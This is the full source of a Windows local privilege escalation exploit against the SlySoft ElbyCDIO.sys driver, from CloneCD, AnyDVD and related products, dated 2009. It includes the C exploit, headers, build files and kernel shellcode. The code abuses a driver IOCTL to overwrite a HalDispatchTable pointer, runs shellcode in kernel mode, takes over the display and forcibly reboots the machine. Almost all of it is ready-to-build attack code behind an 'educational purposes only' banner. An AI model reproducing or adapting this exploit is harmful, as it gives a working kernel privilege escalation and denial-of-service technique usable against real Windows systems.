|
--------------------------------------------------------------------------ElbyCDIO_Exp.c-----------------------------------------
////////////////////////////////////////////////////////////////////////////////////
// +----------------------------------------------------------------------------+ //
// | | //
// | SlySoft Inc. - http://www.slysoft.com/ | //
// | | //
// | Affected Software: | //
// | CloneCD < 5.3.1.4 | //
// | CloneDVD < 2.9.2.2 | //
// | Virtual CloneDrive < 5.4.2.5 | //
// | AnyDVD & AnyDVD HD < 6.5.2.8 | //
// | | //
// | Affected Driver: | //
// | ElbyCD Windows NT/2000/XP I/O driver - ElbyCDIO.sys < 6.0.3.2 | //
// | | //
// | Local Privilege Escalation Exploit | //
// | For Educational Purposes Only ! | //
// | | //
// +----------------------------------------------------------------------------+ //
// | | //
// | NT Internals - http://www.ntinternals.org/ | //
// | alex ntinternals org | //
// | 18 March 2009 | //
// | | //
// | CloneCD/DVD & Virtual CloneDrive & AnyDVD/HD Multiple Vulnerabilities | //
// | NTIADV0812 - http://www.ntinternals.org/ntiadv0812/ntiadv0812.html | //
// | | //
// | References: | //
// | Exploiting Common Flaws in Drivers | //
// | Ruben Santamarta - http://www.reversemode.com/ | //
// | | //
// +----------------------------------------------------------------------------+ //
////////////////////////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "ElbyCDIO_Exp.h"
#include "InvbShellCode.h"
#define IOCTL_METHOD_NEITHER 0x0022E087
#define INPUT_BUFFER_LENGTH 0x0C
#define INTERNAL_BUFFER_LENGTH 0x1C
int __cdecl main(int argc, char **argv)
{
NTSTATUS NtStatus;
HANDLE DeviceHandle;
ULONG AllocationSize = PAGE_SIZE * 64;
ULONG ImageBase;
PVOID MappedBase;
UCHAR ImageName[KERNEL_NAME_LENGTH];
ULONG DllCharacteristics = DONT_RESOLVE_DLL_REFERENCES;
PVOID HalDispatchTable;
PVOID xHalQuerySystemInformation;
ULONG ShellCodeSize = PAGE_SIZE;
PVOID ShellCodeAddress;
UNICODE_STRING ObjectName;
UNICODE_STRING DllName;
UNICODE_STRING DriverServiceName;
ANSI_STRING ProcedureName;
OBJECT_ATTRIBUTES ObjectAttributes;
IO_STATUS_BLOCK IoStatusBlock;
PSYSTEM_MODULE_INFORMATION_EX ModuleInformation = NULL;
LARGE_INTEGER Interval;
ULONG InternalBuffer[INTERNAL_BUFFER_LENGTH / 4];
ULONG InputBuffer[INPUT_BUFFER_LENGTH / 4];
///////////////////////////////////////////////////////////////////////////////////////////////
system("cls");
NtStatus = NtAllocateVirtualMemory(
NtCurrentProcess(), // ProcessHandle
&ModuleInformation, // BaseAddress
0, // ZeroBits
&AllocationSize, // AllocationSize
MEM_COMMIT, // AllocationType
PAGE_READWRITE); // Protect
if(NtStatus)
{
printf(" [*] NtStatus of NtAllocateVirtualMemory [1] - 0x%.8X\n", NtStatus);
return NtStatus;
}
///////////////////////////////////////////////////////////////////////////////////////////////
NtStatus = NtQuerySystemInformation(
SystemModuleInformation, // SystemInformationClass
ModuleInformation, // SystemInformation
AllocationSize, // SystemInformationLength
NULL); // ReturnLength
if(NtStatus)
{
printf(" [*] NtStatus of NtQuerySystemInformation - 0x%.8X\n", NtStatus);
return NtStatus;
}
ImageBase = (ULONG)(ModuleInformation->Modules[0].Base);
RtlMoveMemory(
ImageName,
(PVOID)(ModuleInformation->Modules[0].ImageName +
ModuleInformation->Modules[0].ModuleNameOffset),
KERNEL_NAME_LENGTH);
printf( " +----------------------------------------------------------------------------+\n"
" | ImageBase - 0x%.8X |\n"
" | ImageName - %s |\n",
ImageBase,
ImageName);
NtStatus = NtFreeVirtualMemory(
NtCurrentProcess(), // ProcessHandle
&ModuleInformation, // BaseAddress
&AllocationSize, // FreeSize
MEM_DECOMMIT); // FreeType
if(NtStatus)
{
printf(" [*] NtStatus of NtFreeVirtualMemory [1] - 0x%.8X\n", NtStatus);
return NtStatus;
}
///////////////////////////////////////////////////////////////////////////////////////////////
RtlCreateUnicodeStringFromAsciiz(&DllName, (PUCHAR)ImageName);
NtStatus = LdrLoadDll(
NULL, // DllPath
&DllCharacteristics, // DllCharacteristics
&DllName, // DllName
&MappedBase); // DllHandle
if(NtStatus)
{
printf(" [*] NtStatus of LdrLoadDll - 0x%.8X\n", NtStatus);
return NtStatus;
}
RtlInitAnsiString(&ProcedureName, "HalDispatchTable");
NtStatus = LdrGetProcedureAddress(
(PVOID)MappedBase, // DllHandle
&ProcedureName, // ProcedureName
0, // ProcedureNumber OPTIONAL
(PVOID*)&HalDispatchTable); // ProcedureAddress
if(NtStatus)
{
printf(" [*] NtStatus of LdrGetProcedureAddress - 0x%.8X\n", NtStatus);
return NtStatus;
}
(ULONG)HalDispatchTable -= (ULONG)MappedBase;
(ULONG)HalDispatchTable += ImageBase;
(ULONG)xHalQuerySystemInformation = (ULONG)HalDispatchTable + sizeof(ULONG);
printf( " | |\n"
" | HalDispatchTable - 0x%.8X |\n"
" | xHalQuerySystemInformation - 0x%.8X |\n"
" +----------------------------------------------------------------------------+\n",
HalDispatchTable,
xHalQuerySystemInformation);
NtStatus = XxInitInbv(ImageBase, (ULONG)MappedBase);
if(NtStatus)
{
printf(" [*] NtStatus of XxInitInbv - 0x%.8X\n", NtStatus);
return NtStatus;
}
RtlFreeUnicodeString(&DllName);
RtlFreeAnsiString(&ProcedureName);
LdrUnloadDll((PVOID)MappedBase);
///////////////////////////////////////////////////////////////////////////////////////////////
RtlInitUnicodeString(&ObjectName, L"\\Device\\ElbyCDIO");
ObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
ObjectAttributes.RootDirectory = 0;
ObjectAttributes.ObjectName = &ObjectName;
ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE;
ObjectAttributes.SecurityDescriptor = NULL;
ObjectAttributes.SecurityQualityOfService = NULL;
NtStatus = NtCreateFile(
&DeviceHandle, // FileHandle
FILE_READ_DATA | FILE_WRITE_DATA, // DesiredAccess
&ObjectAttributes, // ObjectAttributes
&IoStatusBlock, // IoStatusBlock
NULL, // AllocationSize OPTIONAL
0, // FileAttributes
FILE_SHARE_READ | FILE_SHARE_WRITE, // ShareAccess
FILE_OPEN_IF, // CreateDisposition
0, // CreateOptions
NULL, // EaBuffer OPTIONAL
0); // EaLength
if(NtStatus)
{
printf(" [*] NtStatus of NtCreateFile - 0x%.8X\n", NtStatus);
return NtStatus;
}
RtlFreeUnicodeString(&ObjectName);
///////////////////////////////////////////////////////////////////////////////////////////////
RtlZeroMemory(InternalBuffer, INTERNAL_BUFFER_LENGTH);
InputBuffer[0] = (ULONG)HalDispatchTable - INTERNAL_BUFFER_LENGTH;
InputBuffer[1] = 0;
InputBuffer[2] = (ULONG)InternalBuffer;
NtStatus = NtDeviceIoControlFile(
DeviceHandle, // FileHandle
NULL, // Event
NULL, // ApcRoutine
NULL, // ApcContext
&IoStatusBlock, // IoStatusBlock
IOCTL_METHOD_NEITHER, // IoControlCode
InputBuffer, // InputBuffer
INPUT_BUFFER_LENGTH, // InputBufferLength
NULL, // OutputBuffer
0); // OutBufferLength
if(NtStatus)
{
printf(" [*] NtStatus of NtDeviceIoControlFile - 0x%.8X\n", NtStatus);
return NtStatus;
}
///////////////////////////////////////////////////////////////////////////////////////////////
ShellCodeAddress = (PVOID)sizeof(ULONG);
NtStatus = NtAllocateVirtualMemory(
NtCurrentProcess(),
&ShellCodeAddress,
0,
&ShellCodeSize,
MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
PAGE_EXECUTE_READWRITE);
if(NtStatus)
{
printf(" [*] NtStatus of NtAllocateVirtualMemory [2] - 0x%.8X\n", NtStatus);
return NtStatus;
}
RtlMoveMemory(ShellCodeAddress, (PVOID)InbvShellCode, ShellCodeSize);
///////////////////////////////////////////////////////////////////////////////////////////////
Interval.LowPart = 0xFF676980;
Interval.HighPart = 0xFFFFFFFF;
printf("\n 3");
NtDelayExecution(FALSE, &Interval);
printf(" 2");
NtDelayExecution(FALSE, &Interval);
printf(" 1");
NtDelayExecution(FALSE, &Interval);
printf(" Hoop\n\n");
NtDelayExecution(FALSE, &Interval);
NtStatus = NtQueryIntervalProfile(
ProfileTotalIssues, // Source
NULL); // Interval
if(NtStatus)
{
printf(" [*] NtStatus of NtQueryIntervalProfile - 0x%.8X\n", NtStatus);
return NtStatus;
}
///////////////////////////////////////////////////////////////////////////////////////////////
NtStatus = NtClose(DeviceHandle); // Handle
if(NtStatus)
{
printf(" [*] NtStatus of NtClose - 0x%.8X\n", NtStatus);
return NtStatus;
}
return FALSE;
}
-------------------------------------------------ElbyCDIO_Exp.h----------------------------------------------------
#define IMP_VOID __declspec(dllimport) VOID __stdcall
#define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall
#define PAGE_SIZE 0x1000
#define OBJ_CASE_INSENSITIVE 0x00000040
#define FILE_OPEN_IF 0x00000003
#define NtCurrentProcess() ((HANDLE)0xFFFFFFFF)
#define KERNEL_NAME_LENGTH 0x0D
#define STATUS_SUCCESS 0x00000000
typedef ULONG NTSTATUS;
typedef struct ANSI_STRING
{
/* 0x00 */ USHORT Length;
/* 0x02 */ USHORT MaximumLength;
/* 0x04 */ PCHAR Buffer;
/* 0x08 */
}
ANSI_STRING,
*PANSI_STRING,
**PPANSI_STRING;
typedef struct _UNICODE_STRING
{
/* 0x00 */ USHORT Length;
/* 0x02 */ USHORT MaximumLength;
/* 0x04 */ PWSTR Buffer;
/* 0x08 */
}
UNICODE_STRING,
*PUNICODE_STRING,
**PPUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES
{
/* 0x00 */ ULONG Length;
/* 0x04 */ HANDLE RootDirectory;
/* 0x08 */ PUNICODE_STRING ObjectName;
/* 0x0C */ ULONG Attributes;
/* 0x10 */ PSECURITY_DESCRIPTOR SecurityDescriptor;
/* 0x14 */ PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
/* 0x18 */
}
OBJECT_ATTRIBUTES,
*POBJECT_ATTRIBUTES,
**PPOBJECT_ATTRIBUTES;
typedef struct _IO_STATUS_BLOCK
{
union
{
/* 0x00 */ NTSTATUS Status;
/* 0x00 */ PVOID Pointer;
};
/* 0x04 */ ULONG Information;
/* 0x08 */
}
IO_STATUS_BLOCK,
*PIO_STATUS_BLOCK,
**PPIO_STATUS_BLOCK;
typedef enum _SYSTEM_INFORMATION_CLASS
{
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemNotImplemented1,
SystemProcessesAndThreadsInformation,
SystemCallCounts,
SystemConfigurationInformation,
SystemProcessorTimes,
SystemGlobalFlag,
SystemNotImplemented2,
SystemModuleInformation,
SystemLockInformation,
SystemNotImplemented3,
SystemNotImplemented4,
SystemNotImplemented5,
SystemHandleInformation,
SystemObjectInformation,
SystemPagefileInformation,
SystemInstructionEmulationCounts,
SystemInvalidInfoClass1,
SystemCacheInformation,
SystemPoolTagInformation,
SystemProcessorStatistics,
SystemDpcInformation,
SystemNotImplemented6,
SystemLoadImage,
SystemUnloadImage,
SystemTimeAdjustment,
SystemNotImplemented7,
SystemNotImplemented8,
SystemNotImplemented9,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemLoadAndCallImage,
SystemPrioritySeparation,
SystemNotImplemented10,
SystemNotImplemented11,
SystemInvalidInfoClass2,
SystemInvalidInfoClass3,
SystemTimeZoneInformation,
SystemLookasideInformation,
SystemSetTimeSlipEvent,
SystemCreateSession,
SystemDeleteSession,
SystemInvalidInfoClass4,
SystemRangeStartInformation,
SystemVerifierInformation,
SystemAddVerifier,
SystemSessionProcessesInformation
} SYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_MODULE_INFORMATION
{
/* 0x0000 */ ULONG Reserved[2];
/* 0x0008 */ PVOID Base;
/* 0x000C */ ULONG Size;
/* 0x0010 */ ULONG Flags;
/* 0x0014 */ USHORT Index;
/* 0x0016 */ USHORT Unknown;
/* 0x0018 */ USHORT LoadCount;
/* 0x001A */ USHORT ModuleNameOffset;
/* 0x001C */ UCHAR ImageName[256];
/* 0x011C */
}
SYSTEM_MODULE_INFORMATION,
*PSYSTEM_MODULE_INFORMATION,
**PPSYSTEM_MODULE_INFORMATION;
typedef struct _SYSTEM_MODULE_INFORMATION_EX
{
/* 0x00 */ ULONG ModulesCount;
/* 0x04 */ SYSTEM_MODULE_INFORMATION Modules[0];
/* 0xXX */
}
SYSTEM_MODULE_INFORMATION_EX,
*PSYSTEM_MODULE_INFORMATION_EX,
**PPSYSTEM_MODULE_INFORMATION_EX;
typedef enum _KPROFILE_SOURCE
{
ProfileTime,
ProfileAlignmentFixup,
ProfileTotalIssues,
ProfilePipelineDry,
ProfileLoadInstructions,
ProfilePipelineFrozen,
ProfileBranchInstructions,
ProfileTotalNonissues,
ProfileDcacheMisses,
ProfileIcacheMisses,
ProfileCacheMisses,
ProfileBranchMispredictions,
ProfileStoreInstructions,
ProfileFpInstructions,
ProfileIntegerInstructions,
Profile2Issue,
Profile3Issue,
Profile4Issue,
ProfileSpecialInstructions,
ProfileTotalCycles,
ProfileIcacheIssues,
ProfileDcacheAccesses,
ProfileMemoryBarrierCycles,
ProfileLoadLinkedIssues,
ProfileMaximum
} KPROFILE_SOURCE;
typedef VOID (NTAPI *PIO_APC_ROUTINE)
(
IN PVOID ApcContext,
IN PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG Reserved
);
IMP_VOID RtlInitAnsiString
(
IN OUT PANSI_STRING DestinationString,
IN PUCHAR SourceString
);
IMP_VOID RtlInitUnicodeString
(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
IMP_VOID RtlCreateUnicodeStringFromAsciiz
(
OUT PUNICODE_STRING DestinationString,
IN PUCHAR SourceString
);
IMP_VOID RtlFreeUnicodeString
(
IN PUNICODE_STRING UnicodeString
);
IMP_VOID RtlFreeAnsiString
(
IN PANSI_STRING AnsiString
);
IMP_SYSCALL LdrLoadDll
(
IN PWSTR DllPath OPTIONAL,
IN PULONG DllCharacteristics OPTIONAL,
IN PUNICODE_STRING DllName,
OUT PVOID *DllHandle
);
IMP_SYSCALL LdrUnloadDll
(
IN PVOID DllHandle
);
IMP_SYSCALL LdrGetProcedureAddress
(
IN PVOID DllHandle,
IN PANSI_STRING ProcedureName OPTIONAL,
IN ULONG ProcedureNumber OPTIONAL,
OUT PVOID *ProcedureAddress
);
IMP_SYSCALL NtAllocateVirtualMemory
(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG AllocationSize,
IN ULONG AllocationType,
IN ULONG Protect
);
IMP_SYSCALL NtFreeVirtualMemory
(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN OUT PULONG FreeSize,
IN ULONG FreeType
);
IMP_SYSCALL NtQuerySystemInformation
(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
);
IMP_SYSCALL NtCreateFile
(
OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PLARGE_INTEGER AllocationSize OPTIONAL,
IN ULONG FileAttributes,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN PVOID EaBuffer OPTIONAL,
IN ULONG EaLength
);
IMP_SYSCALL NtDeviceIoControlFile
(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG IoControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength
);
IMP_SYSCALL NtDelayExecution
(
IN BOOLEAN Alertable,
IN PLARGE_INTEGER Interval
);
IMP_SYSCALL NtQueryIntervalProfile
(
IN KPROFILE_SOURCE Source,
OUT PULONG Interval
);
IMP_SYSCALL NtClose
(
IN HANDLE Handle
);
---------------------------------------------InvbShellCode.h-------------------------------------------------
typedef VOID (*INBV_DISPLAY_STRING_FILTER)
(
PUCHAR *String
);
VOID (__stdcall *InbvAcquireDisplayOwnership)
(
VOID
);
VOID (__stdcall *InbvDisplayString)
(
IN PCHAR String
);
VOID (__stdcall *InbvEnableDisplayString)
(
IN BOOLEAN Enable
);
VOID (__stdcall *InbvInstallDisplayStringFilter)
(
IN INBV_DISPLAY_STRING_FILTER Filter
);
VOID (__stdcall *InbvResetDisplay)
(
VOID
);
VOID (__stdcall *InbvSetScrollRegion)
(
IN ULONG Left,
IN ULONG Top,
IN ULONG Width,
IN ULONG Height
);
VOID (__stdcall *InbvSetTextColor)
(
IN ULONG Color
);
VOID (__stdcall *InbvSolidColorFill)
(
IN ULONG Left,
IN ULONG Top,
IN ULONG Width,
IN ULONG Height,
IN ULONG Color
);
NTSTATUS XxInitInbv(IN ULONG ImageBase, IN ULONG MappedBase)
{
NTSTATUS NtStatus;
ANSI_STRING ProcedureName;
//
// InbvAcquireDisplayOwnership
//
RtlInitAnsiString(&ProcedureName, "InbvAcquireDisplayOwnership");
NtStatus = LdrGetProcedureAddress(
(PVOID)MappedBase, // DllHandle
&ProcedureName, // ProcedureName
0, // ProcedureNumber OPTIONAL
(PVOID*)&InbvAcquireDisplayOwnership); // ProcedureAddress
if(NtStatus)
{
printf(" [*] NtStatus of LdrGetProcedureAddress - InbvAcquireDisplayOwnership - 0x%.8X\n", NtStatus);
return NtStatus;
}
(ULONG)InbvAcquireDisplayOwnership -= MappedBase;
(ULONG)InbvAcquireDisplayOwnership += ImageBase;
//
// InbvResetDisplay
//
RtlInitAnsiString(&ProcedureName, "InbvResetDisplay");
NtStatus = LdrGetProcedureAddress(
(PVOID)MappedBase,
&ProcedureName,
0,
(PVOID*)&InbvResetDisplay);
if(NtStatus)
{
printf(" [*] NtStatus of LdrGetProcedureAddress - InbvResetDisplay - 0x%.8X\n", NtStatus);
return NtStatus;
}
(ULONG)InbvResetDisplay -= MappedBase;
(ULONG)InbvResetDisplay += ImageBase;
//
// InbvSolidColorFill
//
RtlInitAnsiString(&ProcedureName, "InbvSolidColorFill");
NtStatus = LdrGetProcedureAddress(
(PVOID)MappedBase,
&ProcedureName,
0,
(PVOID*)&InbvSolidColorFill);
if(NtStatus)
{
printf(" [*] NtStatus of LdrGetProcedureAddress - InbvSolidColorFill - 0x%.8X\n", NtStatus);
return NtStatus;
}
(ULONG)InbvSolidColorFill -= MappedBase;
(ULONG)InbvSolidColorFill += ImageBase;
//
// InbvSetTextColor
//
RtlInitAnsiString(&ProcedureName, "InbvSetTextColor");
NtStatus = LdrGetProcedureAddress(
(PVOID)MappedBase,
&ProcedureName,
0,
(PVOID*)&InbvSetTextColor);
if(NtStatus)
{
printf(" [*] NtStatus of LdrGetProcedureAddress - InbvSetTextColor - 0x%.8X\n", NtStatus);
return NtStatus;
}
(ULONG)InbvSetTextColor -= MappedBase;
(ULONG)InbvSetTextColor += ImageBase;
//
// InbvInstallDisplayStringFilter
//
RtlInitAnsiString(&ProcedureName, "InbvInstallDisplayStringFilter");
NtStatus = LdrGetProcedureAddress(
(PVOID)MappedBase,
&ProcedureName,
0,
(PVOID*)&InbvInstallDisplayStringFilter);
if(NtStatus)
{
printf(" [*] NtStatus of LdrGetProcedureAddress - InbvInstallDisplayStringFilter - 0x%.8X\n", NtStatus);
return NtStatus;
}
(ULONG)InbvInstallDisplayStringFilter -= MappedBase;
(ULONG)InbvInstallDisplayStringFilter += ImageBase;
//
// InbvEnableDisplayString
//
RtlInitAnsiString(&ProcedureName, "InbvEnableDisplayString");
NtStatus = LdrGetProcedureAddress(
(PVOID)MappedBase,
&ProcedureName,
0,
(PVOID*)&InbvEnableDisplayString);
if(NtStatus)
{
printf(" [*] NtStatus of LdrGetProcedureAddress - InbvEnableDisplayString - 0x%.8X\n", NtStatus);
return NtStatus;
}
(ULONG)InbvEnableDisplayString -= MappedBase;
(ULONG)InbvEnableDisplayString += ImageBase;
//
// InbvSetScrollRegion
//
RtlInitAnsiString(&ProcedureName, "InbvSetScrollRegion");
NtStatus = LdrGetProcedureAddress(
(PVOID)MappedBase,
&ProcedureName,
0,
(PVOID*)&InbvSetScrollRegion);
if(NtStatus)
{
printf(" [*] NtStatus of LdrGetProcedureAddress - InbvSetScrollRegion - 0x%.8X\n", NtStatus);
return NtStatus;
}
(ULONG)InbvSetScrollRegion -= MappedBase;
(ULONG)InbvSetScrollRegion += ImageBase;
//
// InbvDisplayString
//
RtlInitAnsiString(&ProcedureName, "InbvDisplayString");
NtStatus = LdrGetProcedureAddress(
(PVOID)MappedBase,
&ProcedureName,
0,
(PVOID*)&InbvDisplayString);
if(NtStatus)
{
printf(" [*] NtStatus of LdrGetProcedureAddress - InbvDisplayString - 0x%.8X\n", NtStatus);
return NtStatus;
}
(ULONG)InbvDisplayString -= MappedBase;
(ULONG)InbvDisplayString += ImageBase;
printf(" +----------------------------------------------------------------------------+\n"
" | InbvAcquireDisplayOwnership - 0x%.8X |\n"
" | InbvResetDisplay - 0x%.8X |\n"
" | InbvSolidColorFill - 0x%.8X |\n"
" | InbvSetTextColor - 0x%.8X |\n"
" | InbvInstallDisplayStringFilter - 0x%.8X |\n"
" | InbvEnableDisplayString - 0x%.8X |\n"
" | InbvSetScrollRegion - 0x%.8X |\n"
" | InbvDisplayString - 0x%.8X |\n"
" +----------------------------------------------------------------------------+\n\n",
InbvAcquireDisplayOwnership,
InbvResetDisplay,
InbvSolidColorFill,
InbvSetTextColor,
InbvInstallDisplayStringFilter,
InbvEnableDisplayString,
InbvSetScrollRegion,
InbvDisplayString);
RtlFreeAnsiString(&ProcedureName);
return STATUS_SUCCESS;
}
VOID InbvShellCode()
{
UCHAR BugCheck01[] = " 3";
UCHAR BugCheck02[] = " 2";
UCHAR BugCheck03[] = " 1";
UCHAR BugCheck04[] = " Rebooting ...";
UCHAR BugCheckString[] =
" "
" SlySoft Inc. - http://www.slysoft.com/ "
" "
" Affected Software: "
" CloneCD < 5.3.1.4 "
" CloneDVD < 2.9.2.2 "
" Virtual CloneDrive < 5.4.2.5 "
" AnyDVD & AnyDVD HD < 6.5.2.8 "
" "
" Affected Driver: "
" ElbyCD Windows NT/2000/XP I/O driver - ElbyCDIO.sys 6.0.3.2 "
" "
" Local Privilege Escalation Exploit "
" For Educational Purposes Only ! "
" "
" "
" NT Internals - http://www.ntinternals.org/ "
" alex ntinternals org "
" 18 March 2009 "
" "
" CloneCD/DVD & Virtual CloneDrive & AnyDVD/HD Multiple Vulnerabilities "
" NTIADV0812 - http://www.ntinternals.org/ntiadv0812/ntiadv0812.html "
" "
" References: "
" Exploiting Common Flaws in Drivers "
" Ruben Santamarta - http://www.reversemode.com/ "
" "
" ";
__asm
{
//
// KeDisableInterrupts
//
pushf
pop eax
and eax, 0x0200
shr eax, 0x09
cli
//
// Prepareing Screen
//
call InbvAcquireDisplayOwnership
call InbvResetDisplay
sub esi, esi
push 0x04
mov edi, 0x01DF
push edi
mov ebx, 0x027F
push ebx
push esi
push esi
call InbvSolidColorFill
push 0x0F
call InbvSetTextColor
push esi
call InbvInstallDisplayStringFilter
inc esi
push esi
call InbvEnableDisplayString
dec edi
dec edi
push edi
push ebx
dec esi
push esi
push esi
call InbvSetScrollRegion
lea eax, BugCheckString
push eax
call InbvDisplayString
mov esi, 0x80000000
mov ecx, esi
//
// Countdown
//
__loop01:
dec ecx
jnz __loop01
lea eax, BugCheck01
push eax
call InbvDisplayString
mov ecx, esi
__loop02:
dec ecx
jnz __loop02
lea eax, BugCheck02
push eax
call InbvDisplayString
mov ecx, esi
__loop03:
dec ecx
jnz __loop03
lea eax, BugCheck03
push eax
call InbvDisplayString
mov ecx, esi
__loop04:
dec ecx
jnz __loop04
lea eax, BugCheck04
push eax
call InbvDisplayString
mov ecx, esi
shl ecx, 0x01
__loop05:
dec ecx
jnz __loop05
//
// Reseting Processor
//
mov al, 0xFE
out 0x64, al
}
}
----------------------------------------------------sources------------------------------------------------------
TARGETNAME=ElbyCDIO_Exp
TARGETPATH=obj
TARGETTYPE=PROGRAM
SOURCES=ElbyCDIO_Exp.c
UMTYPE=console
UMBASE=0x00400000
TARGETLIBS=$(DDK_LIB_PATH)\ntdll.lib
----------------------------------------------------makefile-----------------------------------------------------
!INCLUDE $(NTMAKEENV)\makefile.def
|
推荐
评论(0条)
